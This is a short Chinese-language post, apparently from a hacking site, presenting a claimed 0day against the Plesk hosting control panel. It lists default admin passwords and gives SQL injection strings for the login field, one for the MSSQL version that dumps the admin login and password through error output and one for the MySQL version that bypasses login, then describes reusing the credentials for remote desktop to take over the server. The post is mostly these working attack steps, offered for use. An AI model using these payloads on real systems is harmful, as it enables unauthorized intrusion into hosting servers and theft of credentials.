plesk panel 虚拟主机管理平台0day

作者：hack1990 时间：11-02-22 阅读数：495人阅读

利用方法：

1：在http://www.xx.com:8880这里，默认的管理员账户密码是admin 密码stepu或者setup

2：在https://www.xx.com:8443

mssql版本

账号 ‘ union select top 1 login+char(124)+passwd from admin_aliases–

报错,爆出账号密码

登陆后server–>remote desktop账号密码一样

拿到服务器权限

mysql版本
‘union select ‘-1 union select 1,1,1#’# 密码填 1

上一篇：phpwind v8.0 后台拿WEBSHELL

下一篇：Tsys信息发布系统V1.1上传漏洞

相关文章

发表评论